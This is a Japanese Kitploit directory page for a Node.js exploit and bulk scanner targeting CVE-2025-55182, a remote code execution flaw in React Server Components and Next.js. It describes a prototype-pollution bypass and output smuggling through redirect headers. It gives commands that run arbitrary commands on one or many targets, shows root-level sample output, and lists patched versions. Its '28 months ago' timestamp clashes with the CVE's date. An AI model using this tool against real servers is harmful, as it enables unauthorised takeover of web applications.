Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
React-Security-CVE-2025-55182-Exploit — React Server Components「React2Shell」脆弱性(CVE-2025-55182)向けのNodeJSベースのエクスプロイトスクリプト兼スキャナー。 | Kitploit
ツール/GitHubGitHub/sangleshubham/react-security-cve-2025-55182-exploit
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubsangleshubham/react-security-cve-2025-55182-exploit

React-Security-CVE-2025-55182-Exploit

React Server Components「React2Shell」脆弱性(CVE-2025-55182)向けのNodeJSベースのエクスプロイトスクリプト兼スキャナー。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
28ヶ月前未レビュー

⚛️ React2Shell Exploit (CVE-2025-55182)

Severity CVSS Node License

React Server Components (React 19 / Next.js) の重大な RCE 脆弱性に対する、軽量かつ自動化された Proof of Concept (PoC) 兼バルクスキャナーです。

⚠️ 法的免責事項

教育およびセキュリティ研究目的に限ります。

このツールは、セキュリティ専門家や管理者が自身のシステムの脆弱性を検証できるように設計されています。作者は、本コードを使用して行われたいかなる誤用、損害、または違法行為についても責任を負いません。

  • 明示的な許可なくターゲットをスキャンしないでください。
  • このツールはターゲットサーバー上でコードを実行します。責任を持って使用してください。

🔍 CVE-2025-55182 とは?

CVE-2025-55182 は、Next.js (App Router) および React 19 で使用される中核パッケージ react-server-dom-webpack におけるリモートコード実行の脆弱性です。

この脆弱性により、認証されていない攻撃者が React Server Actions に悪意のあるペイロードを注入できます。逆シリアル化プロセスを操作することで、攻撃者は JavaScript の Function コンストラクタにアクセスし、サーバー上で任意のシステムコマンドを実行できます。

詳細はこちら: https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components

影響を受けるバージョン:

  • react-server-dom-webpack: 19.0.0 - 19.2.0
  • next: 13.4.x、14.x (pre-14.2.35)、15.x (pre-15.5.9)

🚀 新機能 (v2.0)

この更新されたスクリプトは、より信頼性を高めるために高度な悪用手法を使用しています:

  1. ユニバーサルバイパス: 内部フォームデータに対する プロトタイプ汚染 を使用して、有効な Next-Action ID の必要性を回避します。手動による偵察なしに、脆弱な Next.js インスタンスに対して動作します。
  2. リダイレクトスムグリング: サーバーに偽の「リダイレクトエラー」を強制的に発生させ、コマンド出力を HTTP の Location ヘッダーに紛れ込ませます。これにより 500 エラーを回避し、クリーンな出力を提供します。
  3. バルクスキャン: 単一のコマンドで複数のドメインを検査します。

🚀 セットアップとインストール

  1. リポジトリをクローン:

    root@kitploit:~
    git clone https://github.com/sangleshubham/React-Security-CVE-2025-55182-Exploit.git
    
  2. ディレクトリに移動:

    root@kitploit:~
    cd React-Security-CVE-2025-55182-Exploit
    
  3. Node.js のバージョンを確認: Node.js がインストールされていることを確認してください (v18 以上を推奨)。

    root@kitploit:~
    node -v
    

    (注: このスクリプトは標準の Node.js ライブラリを使用するため、npm install は不要です。)


⚡ スクリプトの実行方法

スクリプト react2shell.js は、単一または複数のターゲットをスキャンしているかどうかを自動的に検出します。

オプション 1: 単一または複数のターゲットをスキャン

デフォルトで実行されるコマンドは id です。

root@kitploit:~
# Single Target
node react2shell.js http://localhost:3000 ls

# Multiple Targets
node react2shell.js http://localhost:3000 [http://staging.example.com] ls

オプション 2: カスタムコマンド

特定のコマンドを実行するには、それを最後の引数として指定します。

root@kitploit:~
# Syntax: node script.js <URL> <COMMAND>
node react2shell.js http://localhost:3000 <command>

📊 出力の見方

  • ⚠️ VULNERABLE (脆弱性あり): ツールがコマンドを正常に実行し、リダイレクトヘッダーを介して出力を紛れ込ませることに成功しました。

    root@kitploit:~
    [*] Starting Universal Scan...
    [*] Payload Command: "id"
    
    ⚠️  VULNERABLE (http://localhost:3000)
        Output: uid=0(root) gid=0(root) groups=0(root)
    
  • 🛡️ SAFE (安全): サーバーがペイロードを拒否したか、パッチが適用されています。

    root@kitploit:~
    🛡️  SAFE (http://google.com) | Status: 405
    
  • ❌ CONNECT ERROR (接続エラー): スクリプトがサーバーに到達できませんでした。

    root@kitploit:~
    ❌ CONNECT ERROR (http://bad-url.com) | fetch failed
    

🛡️ 緩和策

アプリケーションに脆弱性がある場合は、直ちに依存関係をアップグレードしてください。

Next.js の場合:

root@kitploit:~
# Next.js 14
npm install [email protected] react@latest react-dom@latest

# Next.js 15
npm install [email protected] react@latest react-dom@latest

その他のフレームワーク (Waku、Remix など) の場合: react-server-dom-webpack が v19.2.1 以上にアップグレードされていることを確認してください。


📜 ライセンス

MIT ライセンスの下で配布されています。詳細については LICENSE を参照してください。

ツールをダウンロード